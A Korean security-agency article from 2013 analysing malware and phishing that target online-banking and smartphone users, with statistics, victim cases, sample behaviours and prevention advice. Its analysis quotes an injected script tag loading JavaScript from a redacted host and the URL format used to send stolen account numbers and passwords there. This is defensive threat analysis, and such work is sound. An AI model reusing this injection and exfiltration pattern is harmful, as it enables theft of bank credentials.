FOCUS FOCUS 1 금융 소비자를 위협하는 악성코드 위협사례 분석 · 금융...

Internet & Security Focus 2013 5월호6

FOCUS

금융 소비자를 위협하는 악성코드 위협사례 분석

FOCUS 1

심재홍

한국인터넷진흥원 코드분석팀 책임연구원 ([email protected])

Ⅰ. 주요 현황

1. PC 악성코드 동향

2. 스마트폰 악성 앱 동향

3. 피싱 및 파밍 현황

4. 피해사례

Ⅱ. 금융정보 탈취 악성코드 사례

1. 스마트폰 뱅킹 이용자를 겨냥한 공인인증서 유출

악성 앱

2. 국내 인터넷 뱅킹 서비스에 대한 대대적인 악성

코드 공격

3. 호스트 파일 변조를 이용한 금융파밍 공격 악성코드

4. 분산서비스거부공격과 결합된 이용한 금융파밍 공격

5. 시스템 파괴 기능과 결합된 이용한 금융파밍 공격

6. 금융권 SQL 데이터베이스를 손상시키는 해외

악성코드 사례

Ⅲ. 향후전망 및 대응방안

1. 2013년 금융정보 해킹공격 전망

2. 금융피해 악성코드 예방과 결론

인터넷 이용자를 겨냥한 악성코드의 위협은 IT 서비스와 더불어 진화해가고 있다. 특히, 지난 해

중순을 지나는 시점부터 악성코드를 통한 개인의 금융정보 유출시도 사례가 다수 발생하고 있어

인터넷 침해사고의 주요 동향으로 주목을 받고 있다.

해커들은 짧은 시간 내 최상의 성과를 얻기 위해 시스템 및 사람의 취약한 부분을 활용하여

공격을 감행하기 위해 많은 노력을 들이고 있다. 본 고에서는 개인 금융정보를 유출하기 위해

악성코드가 활용한 기법을 주요 사례 위주로 설명하고 이를 기반으로 가능한 대응방법을

제안하고자 한다.

Internet & Security Focus 2013 5월호 7

FOCUS

I. 주요 현황

1. PC 악성코드 동향

한국인터넷진흥원 인터넷 침해사고 대응통계 월보(‘13.1월호)에 따르면 당월 한 달간 신고

접수된 악성코드 감염피해 신고건수는 총 2,557건으로 전월 2,462건 대비 3.9% 증가한 것으로

집계 되었다. 지난 해 연간 피해 신고 된 주요 악성코드로는, 특정 게임 사이트에 접속하면 키보드

입력 값을 유출해 게임계정을 탈취하는 Online Game Hack이 가장 많았고, DDoS 공격 등에

이용되는 Agent 유형이 그 뒤를 이었다. 이러한 추세는 올해 1월까지도 지속되었던 것으로

분석되었다. 그밖에 추가적인 악성코드를 다운로드 받는 다운로더 유형, 공격자가 원격에서

제어하고 백도어 역할이 가능한 봇 유형 등이 상위에 올랐으며, 백신 프로그램의 실행이나

업데이트를 방해하는 AVKiller 유형과 트로이목마 형태의 Urelas 악성코드도 다수 신고 되었다.

[그림 1] 악성코드 신고건수 추이

출처: KISA 인터넷 침해사고 대응통계 1월호

또한, KISA 코드분석팀에서 지난 해부터 현재까지 수집된 PC 악성코드들을 행위별로 분류한

결과 게임계정 유출의 경우가 전체 31%로 다수를 차지하는 등 일관된 결과가 조사되었다. 또한,

同 기간의 데이터를 분석한 결과 웹 사이트를 통해 이용자에게 전파된 경우가 전체의 30%로

대부분을 차지하고 있어 웹 사이트가 여전히 인터넷 이용자에게 위협요인이 되고 있으며

지속적인 예방적 차원의 관리가 필요하다.


FOCUS 주요 악성유형 분포

게임계정 탈취 289건 (31%)

다운로더 222건 (24%)

DDos 124건 (13%)

원격제어 121건 (13%)

피싱・파밍 57건 (6%)

[그림 2] 악성코드 주요 행위별 분류

주요 전파경로 분포

웹 사이트 286건 (30%)

IE 취약점 25건 (3%)

PDF 파일 7건 (1%)

한글 파일 16건 (2%)

MS 문서 10건 (1%)

Adobe 취약점 8건 (1%)

[그림 3] 악성코드 주요 전파경로별 분류

주: 위 표에 언급된 수치는 3,693개 악성코드에 대한 자체 분석결과로 타 기관 및 업체의 내용과 다를 수 있음

출처: KISA 수집 PC 악성코드 분석동향 (‘12.1 ~ ’13.3)

기업 및 조직에서는 대체적으로 위협이 되는 웹 사이트 접속을 차단하는 등의 보안 통제를

적용하고 있으나 내부인이 자의로 열람하는 악성문서 및 알려지지 않은 위험한 웹 사이트에

대해서는 통제를 가할 방법이 없다. 따라서, 위 전파경로에 따른 분류 결과에서도 알 수 있듯이

기업 및 조직의 중요한 기밀을 다루는 곳에서는 악성 웹 사이트와 E-mail 첨부파일을 통해

전파되는 사회 공학적 공격에 대한 대응을 심화할 필요가 있다.

2. 스마트폰 악성 앱 동향

과거 모바일 악성코드는 주로 Symbian(심비안) 운영체제에서 주로 발생했던 것으로 알려져

있었다. 이로 인해 국내 이동통신 서비스는 모바일 악성코드에 비교적 안전한 것으로


FOCUS

인식되어져 왔었다. 하지만, 국내・외 안드로이드 폰 이용이 폭발적으로 증가하면서 모바일

악성코드의 공격대상에도 변화가 일어났다. 국내 최초의 모바일 악성코드는 지난 2010년

윈도우 모바일 운영체제를 탑재한 스마트폰에서 국제전화를 무단으로 발신하여 과금 피해를

유발시키는 악성코드(‘WinCE/Terdial’, ‘10.4.19)였다. 이후, 안드로이드 운영체제가 탑재된

스마트폰과 이를 지원하기 위한 온라인 앱 마켓이 활성화 되면서 스마트폰이 봇물을 이루기

시작했다. 최근 해외 보안업체에서는 현재까지 전 세계적으로 모바일 악성코드가 약 37,000종

수준이라고 보고하고 있다. 국내에서는 2012년 안드로이드 악성 앱(InfoStealer, ‘12.1.6)이

최초로 발생한 이후 꾸준히 증가추세를 이어오고 있다. 특히, 지난 해 10월에 발생한 국내

정부부처를 사칭한 악성 앱이 구글 마켓을 통해 유포되면서부터 악성 앱은 본격적으로 초미의

관심사로 대두되었다.

이들 악성 앱의 주요 특징은 수신된 문자 메시지를 탈취하여 해커에게 전송하도록 설계되어

있으며 해커는 이러한 문자로 전달되는 정보를 가로채어 소액결제 사기라는 2차

공격(Smishing)에 악용할 수 있다. 2012년 1월부터 올해 3월까지 스마트폰 악성 앱에 대한

분석결과를 종합해 본 결과 지난 해 1월 1건의 악성 앱이 발생한데 반해 금년도 1월에는 55건이

발생하여 55배 수준으로 폭증하였다.

[그림 4] 악성 앱 발생 추이

주: 위 표에 언급된 수치는 3,693개 악성코드에 대한 자체 분석결과로 타 기관 및 업체의 내용과 다를 수 있음

시기 ’12.1 ’12.10 ’12.12 ’13.1 ’13.3

발행 1건 3건 8건 55건 207건

구분 소액결제 금융피싱 DDos

현황 223 (85%) 21 (8%) 18 (7%)

� 악성 앱 발생 건수 (당월기준)

� 악성 앱 행위 유형

수집된 악성 앱 분석결과 소액결제 인증번호를 탈취하는 악성 앱이 전체의 85%를 차지하였으며

인증서 등 금융정보를 유출시키는 유형은 약 8% 수준으로 조사되었다. 대부분의 악성 앱(255건)은

문자메시지에 포함된 단축 URL을 통해 사용자가 설치하도록 유도하는 전형적인 사회공학적

공격기법을 차용하고 있다. 또한, 이 중 7건은 정식 구글 앱 마켓을 통해 유포된바 있어 앱 마켓의

검증 체계에 대한 문제점으로 지적되고 있다. 해커는 문자메시지 내용을 주로 구글・삼성・국민연금


FOCUS

등 이용자가 신뢰성 있는 기관 또는 아웃백, 피자헛 등 요식업체에서 발송한 무료쿠폰으로

가장함으로써 공격 성공률을 향상시키려고 하는 의도가 엿보였다.

향후에도 해커는 최소한의 노력으로 최대한의 효과를 얻기 위해 지속적으로 스팸 메시지에

포함된 단축 URL을 이용할 것으로 판단된다. 이는 스마트폰 악성코드를 전파할 수 있는 수단이

취약점 보다는 사회공학적 공격 기법을 이용하는 것이 수월함에 기인하고 있다고 할 수 있다.

이렇듯 스마트폰 악성 앱이 최근 급증하게 된 이유는 여러 요인에 의해 분류될 수 있다. 첫째,

PC 환경에서도 사회 공학적 공격이 성공할 수 있지만 다년간의 보안인식 제고와 백신의

영향으로 악성코드 감염 전 탐지 및 제거가 용이해지고 있어 해커들은 스마트폰으로 관심을

돌린 것으로 보인다. 둘째, 현재 스마트폰 백신 이용이 활성화 되어 있지 않아 악성 앱을

다운로드 하더라도 실제 피해가 유발되기 전에 탐지하는 것이 어려운 점도 있다. 셋째, 소액결제

탈취 공격은 건당 30만원 이하 수준이지만 금융정보를 확보하는 경우 상당한 수준의 금전적

이득을 일시에 취득 가능한 것도 해커에게는 메리트로 작용했던 것으로 보인다. 마지막으로

정상 앱을 변조하여 유포하는 방식은 여전히 유효할 것으로 판단되는 데 이는 개인으로부터

금전적인 이득을 취하기 위한 해커로서는 새로운 악성 앱을 만드는 수고보다 기존 앱을

변조하는 쉬운 방법을 택하는 것이 효과적일 것이라고 판단할 수 있다.

3. 피싱 및 파밍 현황

피싱(Phishing)과 파밍(Pharming)은 근본적으로 사용자를 속이는 행위가 뒷받침되어 있다.

피싱은 E-mail 또는 메신저 등을 이용하여 사용자에게 가짜 정보를 전달하고 이를 통해

악성코드 감염 또는 정보를 유출시키는 행위이지만 파밍은 이미 악성코드에 감염된 후 사용자

PC의 호스트 파일이 임의로 변조되고 이를 인지하지 못한 채 해커가 꾸며놓은 곳으로 강제

유도되는 특징이 있다.

최근 이로 인해 가짜 금융 사이트를 정상 사이트로 오인해, 보안카드 및 비밀번호 등 개인의

중요한 정보를 해커에게 전달하는 등의 금융 소비자 침해사고가 자주 발생하고 있다.

한국인터넷진흥원 인터넷 침해사고 대응통계 1월호에 따르면 지난 해 12월 한 달간 국내 기관을

사칭한 피싱 사이트 차단 건수는 전월 대비 19.5% 감소한 277건 이지만, 연간 추이로 살펴보면

6,944건으로 전년 대비 275.6% 증가했던 것으로 집계되었다. 더불어, 2011년에는 정부기관이나

공공기관을 사칭한 피싱 사이트가 많이 발견되었으나, 2012년에는 금융기관을 사칭한 피싱

사이트가 크게 증가하였다.


FOCUS

[그림 5] 피싱 및 파밍 악성코드 공격 개요도

파밍 기법은 최근 발생한 악성코드에서 찾을 수 있는 주요 특징은 아니다. 지난 2007년에도

이미 은행권, 포털 등 기업들에서는 피싱・파밍 공격에 대한 예방 대책을 내놓은 바 있다. 또한,

당시 악성코드 중에는 국내 유명 포털사의 로그인 화면을 피싱 사이트로 유도시켜 가입자

정보를 유출시키는 사례도 있었다. 금융감독원 3월 4일 보도 자료에 따르면, 금융분야에 대한

피싱・파밍 공격은 2011년도부터 본격적으로 발생하기 시작하였으며, 2012년 들어 대폭

증가한 것으로 언급하고 있다. 특히, 보안승급 등을 이유로 개인정보 및 금융거래 정보 입력을

유도하는 금융기관 사칭 피싱 사이트가 급증한 것으로 금융감독원에서는 언급하고 있다. 이는

최근 발생한 일련의 대규모 개인정보 유출사고로 인해 인터넷 이용자들이 정보에 대한 관심이

커진 것에 기인하는 것으로 판단된다.

구분 ’12.11~’12.12 ’13.1~’13.2 합계

발생건수(건) 146 177 323건

피해금액(억원) 9.6 11 20.6

<표 1> 피싱・파밍 사고 발생 현황 및 피해금액

출처: 금융감독원 보도자료 “보이스피싱(파밍) 합동 경보 발령!” (3.4)

[정상]사이트

[피싱]사이트


FOCUS

사칭기관 ’05~’10 ’11 ’12 합계

금융기관 7 74 4,242 4,323

공공기관 15 1,775 2,702 4,492

공공기관 22 1,849 6,944 8,815

<표 2> 피싱 사이트 차단 현황 (단위 : 건)

주: ‘12.11월 ~ ’13.2월 중 약 323건의 피싱・파밍 사고가 발생했으며 이로 인한 피해금액은 20.6억원 수준(금융감독원)




3. 피해사례

[사례 1]

□ 서울시 관악구에 거주하는 장모씨(여, 40대초반, 주부)는 ’13.1.16일 오후 10시경 본인이 사용하는 컴퓨터로

인터넷 포털사이트(다음)검색을 통하여 S은행에 접속하였으나 동 은행을 가장한 피싱사이트로 접속이 되었고,

◦ 인터넷뱅킹에 필요한 정보를 입력하는 팝업창이 나타나 개인정보(주민등록번호 등) 및 금융거래정보

(계좌번호, 계좌비밀번호, 보안카드번호 전체 등)를 입력하였는데,

◦ 사기범이 피해자가 입력한 정보를 이용하여 ’13.1.20일 저녁 8시경 피해자 명의의 공인인증서를

재발급 받아 인터넷뱅킹으로 피해자의 S은행 계좌에서 2,000만원을 이체하여 편취

[사례 2]

□ 경기도 군포시에 거주하는 이모씨(여, 30대중반, 공무원)는 ’13.2.19일 오후 8시경 본인이 사용하는

컴퓨터로 인터넷 주소 즐겨찾기를 이용하여 N은행의 인터넷뱅킹 주소로 접속하였으나 동 은행을 가장한

피싱사이트로 접속이 되었고,

◦ 인터넷뱅킹에 필요한 정보를 입력하는 팝업창이 나타나 개인정보(주민등록번호 등) 및 금융거래정보

(계좌번호, 계좌비밀번호, 보안카드번호 전체 등)를 입력하였는데,

◦ 사기범이 피해자가 입력한 정보를 이용하여 ’13.2.20일 새벽 1시경 피해자 명의의 공인인증서를

재발급 받아 인터넷뱅킹으로 피해자의 N은행 계좌에서 5,000만원을 이체하여 편취

위 사례에서 알 수 있듯이 최근 피싱・파밍 악성코드로 인해 인터넷 이용자에게 어떠한

피해가 파급되는지 실체를 잘 보여주고 있다. 최근 이러한 피해 사례가 지속적으로 증가함에

따라 금융위·경찰청·금감원 3개 기관은 지능화되고 있는 보이스 피싱 수법에 적극 대응하고


FOCUS

피해확산을 조기에 차단 및 예방하기 위해 공동 경보발령 및 전파・홍보 제도(‘합동경보제’)를

2012년 12월에 도입하여 운영 중에 있다.

Ⅱ. 금융정보 탈취 악성코드 사례

1. 스마트폰 뱅킹 이용자를 겨냥한 공인인증서 유출 악성 앱

2013년 3월 10일, 국민연금 미납금을 사칭하여 전파되는 악성 앱이 KISA 118센터를 통해

접수되었다. 해당 악성 앱은 이전에 발생해 온 소액결제 탈취 악성 앱들과는 달리 스마트폰에

저장된 공인인증서와 사진 및 메모 정보를 통째로 압축하여 원격지로 유출시키는 악성행위를

포함하고 있었다.

해당 악성 앱은 스마트폰 이동식 저장장치에 있는 공인인증서(NPKI), 사진(DCIM),

메모(SMEMO) 폴더를 접근하여 압축시키고 이를 원격지로 전송한다. 이는 일부 스마트폰

이용자들 중에는 공인인증서와 함께 보안카드를 이미지로 저장해 놓고 기억하기 어려운

ID/PASS 정보를 메모에 기록해 놓는 점을 악용하는 것으로 추정된다. 또한, 감염된

스마트폰에서 수신 및 저장된 문자 메시지를 탈취하는 행위도 파악되어 부수적으로 소액결제를

노리는 것으로 분석 되었다.

2. 국내 인터넷 뱅킹 서비스에 대한 대대적인 악성코드 공격

지난 2011년 8월 하순에 국내 18개 인터넷 뱅킹 서비스를 겨냥한 악성코드가 유포되었다.

해당 악성코드는 이용자가 인터넷 뱅킹 서비스를 이용하려고 할 때 활성화되는 공인인증서

로그인 화면을 위조하여 사용자의 인증서 패스워드를 비롯한 계좌이체에 필요한 계좌번호, 이체

비밀번호를 수집하였다. 또한, 감염 PC에 Poison Ivy라는 백도어 프로그램을 심어놓아 수집된

금융정보를 유출시키는 방법을 취했다.

이번 금융정보 탈취 악성코드는 총 18종이 발견되었다. 악성코드 제작시점은 동년 7월 17일로

파악되었으며 공격대상 은행사별로 악성코드 명칭이 부여되었다. 해당 악성코드들은 인터넷

뱅킹 이용 시 윈도우 화면이 생성되는지 모니터링한 후 생성된 윈도우의 이름, 클래스 명을


FOCUS

[그림 6] 국민연금콜센터 사칭 악성 앱 원문 메시지

[그림 7] 국민연금콜센터 사칭 악성 앱 주요 악성 행위

※ 압축파일을 암호화 채널을 통해 원격지로 전송

비교하여 공인 인증서 화면인 경우 패스워드 입력 컨트롤 위에 가짜 암호 입력 상자를

표시하도록 조작한다. 이런 경우, 사용자가 입력했던 텍스트 상자는 ‘키보드 보안 프로그램’에

의해 보호되지 않는다. 이렇게 입력된 인증서 패스워드는 “%WINDOW%\banklog\

은행명.log”에 저장되고 이후 원격제어 악성코드를 이용해 유출해 가는 것으로 파악되었다.

또한, 농협 인터넷 뱅킹 사이트 접속 시 페이지 내에 아래와 같은 스크립트 삽입되어 있어 Web

Injection 공격이 수행되었던 것으로 추정되었다. 하지만 해당 사이트가 당해 8월 초 변경되어

Injection된 스크립트는 동작하지 않을 것으로 보인다.

<br><script defer src='http://www.OOOOO.com/cleanup/admin/webpage/security.js'></script>

위 스크립트는 패스워드를 입력하는 컨트롤의 텍스트 내용을 변경하고 사용자로 하여금

변경된 컨트롤에 계좌정보 등을 입력하도록 유도했을 것으로 파악되었다. 결국, 사용자가

입력한 금융정보는 아래와 같은 형식으로 경유지에 전달되었을 가능성이 있다.

http://www.OOOOO.com/cleanup/admin/webpage/in.asp?servname=OOOOO.com&password="

계좌번호"&bankpass="패스워드1"&rolerank="패스워드2(이체비밀번호)"&secopass="******"


FOCUS

[그림 8] 감염 상태 인증서 암호 입력 [그림 9] 생성된 공인인증서 암호 로그

3. 호스트 파일 변조를 이용한 금융파밍 공격 악성코드

지난 해 중순, 공인인증서와 계좌 비밀번호를 탈취하는 악성코드가 발견되었다. 해당

악성코드는 호스트 파일을 변조시킴으로써 사용자가 국내 주요 금융기관 접속 시 정상

사이트와 다른 도메인으로 접속을 유도하는 악성행위를 보였다.

해당 악성코드는 감염된 PC의 윈도우즈 디렉터리에 2개의 실행파일을 생성시키는 Dropper

기능을 가지고 있으며 각각 파밍 공격을 수행하는 것과 호스트 파일을 변조시키는 악성행위를

나타내고 있다. 또한, 호스트 파일을 변조할 때 사용할 명령조종지의 IP 주소가 기록되어 있는

설정파일도 생성된다.

추가로 생성되는 악성코드의 행위 순서상으로 재배치 해보면, 우선 HDSetup36.exe에 의해

감염PC의 호스트 파일이 변조되고, 이후 CretClient.exe에 의해 수집된 공인인증서 관련 정보가

원격지로 유출되게 된다. 다음은 각각의 악성행위에 대한 분석결과이다.

HDSetup36.exe는 감염PC내 원본 호스트 파일을 삭제한 후 명령어를 이용하여 호스트 파일을 변조시킨다.

만일, 생성된 config.ini 파일이 없는 경우 악성코드는 ‘Error’로 명령조종지 IP 주소를 대체하게

된다. 이런 경우, 해커가 의도한 파밍 공격은 발생하지 않게 된다. 또한, 악성코드가 재부팅

후에도 자동으로 실행되도록 만들기 위해 윈도우즈의 레지스트리 데이터를 변조한다.

① %WINDOWS%\CretClient.exe

② %WINDOWS%\HDSetup36exe

③ %WINDOWS%\config.in

[그림 10] 악성코드에 의해 생성되는 추가 파일들


FOCUS

CretClient.exe는 사용자의 입력을 가로채어 공인인증서 및 인증서 비밀번호와 감염PC의 현재

날짜를 명령조종지로 전송한다. 분석결과 명령조종지의 IP주소는 악성코드 내에

하드코딩(HardCoding) 되어 있었다.

4. 분산서비스거부공격 모듈이 포함된 금융파밍 공격

지난 해 12월 중순에 발견된 금융파밍 악성코드에서는 분산서비스거부공격을 수행하는 코드

블럭이 발견되었다. 실제 해당 악성코드로 인한 공격 발생사례가 보고되지 않았으나 다른

공격모듈이 포함되어 있다는 점은 주목할 만하다.

악성코드에서 파악된 분산서비스거부공격 루틴은 GET Flooding 공격을 수행하는 것으로

[그림 11] 호스트 파일 변조 전・후

[그림 13] 금융파밍 악성코드에 포함된 DDoS 공격 모듈 (GET Flooding)

[그림 12] 명령조종지로 전송되는 공인인증서 관련 정보


FOCUS

다음 그림과 같다.

더불어, 국내 주요 은행접속을 피싱사이트로 유도시키기 위한 호스트 파일 변조 행위도

아래와 같이 발견되었다.

5. 시스템 파괴 기능과 결합된 이용한 금융파밍 공격

지난 해 12월 말, 국내 유명 보안업체의 블로그에 게시된 금융파밍 악성코드에서 시스템 손상

기능이 발견되어 세간에 주목을 끌었다. 해당 악성코드는 본래의 목적대로 사용자가 금융

사이트에 접속 시 피싱 사이트로 접속을 유도하고 특정 날짜 이후인 경우 시스템 폴더 내에

있는 모든 파일들을 삭제하도록 설계되어 있었다.

먼저 윈도우즈 시스템 디렉터리에 숨김(HIDDEN) 속성으로 된 1개의 하위 디렉터리를

생성한 후 2개의 실행파일을 추가로 만든다. 프로세스 모니터링 도구에서 보면 winlogon.exe와

계산기 프로그램이 실행 중인 것처럼 위장하고 있으나 실제로는 악성코드가 동작하고 있어

악성행위를 은폐하려고 했던 시도로 파악되었다.

① C:\WINDOWS\system32\muis\tempblogs.\tempblogs..\1216

② C:\WINDOWS\system32\muis\tempblogs.\tempblogs..\csrsses.exe

③ C:\WINDOWS\system32\muis\tempblogs.\tempblogs..\winlogones.exe

이 후, 인터넷 이용자가 국내 일부 금융 사이트를 접속하려고 할 때 해커가 구성해 놓은 피싱

사이트로 접속되도록 유도한다. 주목할 점은 기존의 호스트 파일을 변조시키는 방식이 아닌

특정 윈도우즈 API(SendMessage)를 이용하였다.

[그림 15] 생성되는 파일 및 악성행위 은폐 시도

[그림 14] 호스트 파일 변조를 통한 피싱 공격


FOCUS

해당 파밍 악성코드의 공격방식은 인터넷 뱅킹 접속 시 SendMessage 함수를 호출하여 인터넷

익스플로러의 주소창의 URL 정보를 피싱 사이트 URL로 변경시킨다. 그리고, 피싱 사이트에

접속되면 또다시 SendMessage 함수를 호출하여 인터넷 익스플로러의 주소창에 정상 URL이

보여 지도록 조작한다.

이와 같이 SendMessage 함수를 이용하면 인터넷 익스플로러에 대한 Code Injection 또는

호스트 파일 변조라는 별도의 과정을 필요로 하지 않는다. 더불어, 특정 날짜 이후가 되면

배치파일을 생성하여 윈도우즈 시스템 디렉터리 내에 있는 모든 파일을 삭제하고 백신

프로그램이 존재하면 강제로 종료시키도록 구성되어 있다.

[그림 16] 인터넷 익스플로러의 URL 주소를 강제로 변경

[그림 17] 정상으로 보여지는 인터넷 익스플로러 주소

[그림 18] 시스템 폴더 삭제 배치파일 생성 및 동작날짜


FOCUS

6. 금융권 SQL 데이터베이스를 손상시키는 해외 악성코드 사례

중동지역에서 발생하는 악성코드는 2010년 Stuxnet이 발생한 이후, 세간의 주목을 받고 있다.

이들이 주목받는 이유는 특정 국가의 기밀정보를 유출시키기 위해 전문화된 조직에서 제작한

것으로 추정되어지고 있기 때문이다. 이번에 설명할 금융권 악성코드는 앞서 설명했던 금융정보

유출보다는 금융정보를 파괴하여 사회혼란을 유발시킬 목적으로 제작되었으며 이란에서

발견된 악성코드이다.

해당 악성코드는 이동식 디스크와 네트워크 공유폴더를 통해 다른 시스템으로 전파하도록

구성되어 있다. 다른 악성코드와 같이 윈도우즈 시스템 폴더에 자기 자신을 복사하고 재부팅 후

자동실행을 위해 Registry 값을 변조시킨다.

악성코드 분석결과 윈도우즈의 GetDriveTypeA API를 이용하여 시스템에 존재하는 모든 논리

드라이브를 검색한다. 검색 된 드라이브에는 CopyFileA라는 API를 이용하여 악성코드 자신을

복사한다. 이 때 복사되는 악성코드 파일명은 ‘maliran.exe’, ‘amin.exe’, ‘shahd.exe’ 등

중동지역에서 사용하는 이름으로 변경된다.

해당 악성코드의 네트워크 공유폴더를 이용한 전파는 약간 복잡한 방식을 이용하였다. 우선

‘net view’라는 윈도우즈 명령어를 이용하여 감염 시스템 주변 네트워크를 검색한다. 해당 검색

결과가 저장될 수 있도록 하기 위해 PIPE를 생성시키고 StartupInfo를 PIPE와 연결 시켜 놓았다.

[그림 19] 논리 드라이브 검색 및 악성코드 복사


FOCUS

이번 악성코드의 주요한 특징 중 하나는 SQL 데이터베이스 관련 프로세스를 강제로

종료시키고 SQL 데이터베이스 관리자 계정정보를 수집한다. 마지막으로 데이터베이스를

조작하여 특정 레코드를 삭제 또는 업데이트 하는 악성행위를 수행한다. 데이터베이스 관리자

계정정보는 데이터베이스 로그인 폼을 생성시켜 이용자로 하여금 정보를 입력하도록 유도하는

방법을 취했다. 이번 악성코드가 금융정보를 파괴함으로써 혼란을 유발시킬 목적으로

제작되었다는 점은 데이터베이스의 특정 정보를 파괴하는 것에서 유추할 수 있다.

위 [그림 20]에서 볼 수 있듯이 ‘hesabjari’는 경상수지를 ‘pasandaz’는 예금을 ‘asnad’는

금융채를 의미하는 중동지방의 단어들이다. 즉, 경상수지, 금융채 및 예금과 같이 국가 차원에서

관리될 만한 정보들이 이번 악성코드의 공격대상인 것이다.

Ⅲ. 향후전망 및 대응방안

1. 2013년 금융정보 해킹공격 전망

위 [그림 21]은 인터넷 침해사고를 유발시킨 악성코드에 대한 연대기를 보여주고 있다. 해외

보안업체 시만텍의『 2012년 노턴 사이버 범죄 보고서』에 따르면 “연간 5억 5,600만 명, 하루에

150만 명”, “초당 18명 피해”, “인터넷 이용 성인은 평생 2/3가 피해, 전년 46% 피해”, “전

세계적으로 사이버범죄 금전 피해는 1,100억 달러”, “피해자 별 평균 손실은 197 달러”, “모바일

이용자의 31%가 스팸 수신” 및 “인터넷 이용 성인 10명 중 1명 모바일 사이버 범죄 경험”으로

전 세계적으로 피해가 발생하고 있는 것으로 조사되었다. 단편적인 사례의 나열만으로 앞으로의

금융정보에 대한 공격 동향을 전망하는 것은 다소 무리가 있을 수 있다. 하지만, 이들 악성코드

제작기법에 좀 더 발전된 난독화 및 암호화 기법이 적용 될 것으로 예상된다.

[그림 20] 데이터베이스의 특정 정보를 삭제 또는 업데이트


FOCUS

지난 해 10월부터 금년도 3월까지 자체 분석한 약 400여종의 스마트폰 악성 앱은 주로

정부・공공기관, 유명 브랜드, 금융기관, 모바일 백신 및 이동통신사 등으로 사칭하여 유포된

것으로 조사되었다. 또한, 1장의 PC 악성코드 동향에서도 알 수 있듯이 웹 사이트를 통한

악성코드 전파가 전체의 30%를 차지하여 주요한 유포수단이라는 것도 짐작할 수 있다. 결국,

앞으로도 금융정보 유출 악성코드 및 악성 앱들은 사람을 매개로 하는 유포방식이 지속될

것으로 예상된다.

최근까지 발생한 악성 앱들에 대한 분석결과를 살펴보면 내부 코드가 매우 유사하고 그

출현주기도 유사한 것을 알 수 있었다. 다시 설명하면, 지난 해 정부기관(방송통신위원회) 사칭

악성 앱이 출현하고 약 1달 정도는 그와 유사한 형태의 악성 앱이 지속적으로 출현하였다. 이후,

분산서비스거부공격 모듈이 첨가된 악성 앱들이 짧은 기간 동안 발생하였으며 이후 원격지

주소가 암호화된 악성 앱들이 발견되었다.

이는 당시 이슈가 되었던 악성코드 및 악성 앱의 기술적인 부분을 스크립트 키드 또는 툴 키드

들이 모방했다고 유추할 수 있으며 동일 인물의 소행이라고 가정한다면 이용자로부터 중요한

정보를 탈취하기 위해 지속적으로 자신의 능력을 키우고 있다고 할 수 있다.

[그림 21] 주요 인터넷 침해사고 연대기


FOCUS

① 의심스러운 애플리케이션 다운로드하지 않기

② 신뢰할 수 없는 사이트 방문하지 않기

③ 발신인이 불명확하거나 의심스러운 메시지 및 메일 삭제하기

④ 비밀번호 설정 기능을 이용하고 정기적으로 비밀번호 변경하기

⑤ 블루투스 기능 등 무선 인터페이스는 사용 시에만 켜놓기

⑥ 이상증상이 지속될 경우 악성코드 감염여부 확인하기

⑦ 다운로드한 파일은 바이러스 유무를 검사한 후 사용하기

⑧ PC에도 백신프로그램을 설치하고 정기적으로 바이러스 검사하기

⑨ 스마트폰 플랫폼의 구조를 임의로 변경하지 않기

⑩ 운영체제 및 백신프로그램을 항상 최신 버전으로 업데이트하기

① 개인정보를 절대 알려주지 말 것

② 보안카드번호 요구에 유의할 것

③ 금융회사의 보안강화 서비스에 반드시 가입할 것

④ 출처가 불분명한 파일 다운로드나 이메일 클릭 금지

⑤ 금융회사는 온라인을 통해 보안승급 등을 요구하지 않음

⑥ 피해발생 시 경찰청(112) 또는 금융회사에 즉시 지급정지 요청

[표 3] 스마트폰 이용자 10대 안전수칙 (한국인터넷진흥원, 2010년 2월)

[표 4] 보이스 피싱 및 파밍 피해 주의

주: http://www.boho.or.kr/kor/private/private_02.jsp

출처: 한국인터넷진흥원 보호나라 홈페이지

주: 각 항목별 세부 내용은 금융감독원 홈페이지 보도자료 게시판에서 확인할 수 있음

출처: 금융감독원 3월 4일자 언론보도 (‘보이스피싱(파밍) 합동경보 발령’) 자료

위 [표 3][표 4]와 같이 (舊)방송통신위원회와 금융감독원에서는 스마트폰 악성코드로 인한

국내 모바일 서비스 환경의 교란을 우려하여 이용자들에게 올바른 스마트폰 이용에 관한

수칙을 제시한 바 있다.

스마트폰 또는 PC 이용자 입장에서는 의심스럽거나 신뢰할 수 없는 사이트를 방문하지 않고

P2P 등 비정상적인 경로를 통해 입수한 프로그램은 설치하지 않는 것은 개인보안에 있어 가장

2. 금융피해 악성코드 예방과 결론

우리나라 정부를 비롯한 금융당국에서도 이러한 금융정보를 노리는 해킹에 대하여 관심을

가지고 있으며 대응정책을 연이어 제시하고 있는 상황이다.


FOCUS

중요하다.

또한, 정부에서는 인터넷에서 유통되는 악성코드 제작기법, 도구 등의 거래에 대한 감시활동

강화와 앱 마켓 사업자 중심으로 등록되는 앱에 대한 검증체계를 개선하여 최소한 정식 마켓을

통한 악성 앱 유포는 차단할 수 있도록 해야 할 것이다.

특히, 인터넷으로 금융 서비스를 자주 이용하는 사용자들에게는 각 금융회사에서 피싱 방지를

위해 제공하는 개인화 이미지 등 기술적 보호수단과 전자금융사기 예방서비스에 가입할 것을

권장하는 바이며, 공공기관 및 금융기관 등 어느 곳에서도 금융거래 시 보안카드 또는

비밀번호를 요구하지 않는다는 것을 인지하고 있어야 한다. 이와 더불어, 금융 서비스를

제공하는 사업자는 금번 3.20 사이버 공격을 교훈삼아 비교적 안전한 영역으로 인식되어 왔던

내부 망 시스템들에 대한 보안통제 체제를 재차 점검해야 할 것이다.

경찰이 24시간 치안을 위해 노력하더라도 범죄를 완전히 소탕할 수 없는 것과 같이 인터넷

침해사고 또한 완벽한 예방은 불가능하다. 어떠한 분야를 막론하고 악성코드 또는 악성 앱은

서비스 이용자에게 분명히 해로운 존재이다. 하지만, 창과 방패의 싸움이라고 표현되는 보안의

속성 상 완벽한 솔루션을 제시하기는 불가능하다고 생각한다. 결국, 이용자에 대한 보안

인식제고 강화가 모든 보안 솔루션을 뒷받침하고 있어야 기대했던 효과를 볼 수 있을 것이다.

참고문헌

한국인터넷진흥원 2013년 4월 인터넷 침해사고 대응통계

한국인터넷진흥원 보호나라 스마트폰 이용자 10대 안전수칙

금융감독원 3월 4일자 보도자료 “보이스피싱(파밍) 합동 경보 발령!”

금융감독원 5월 27일자 금융감독정보 2013년 21호

McAfee Threats Report: Fourth Quarter 2012, Feb, 25, 2013

Microsoft Security Intelligence Report Volume 14

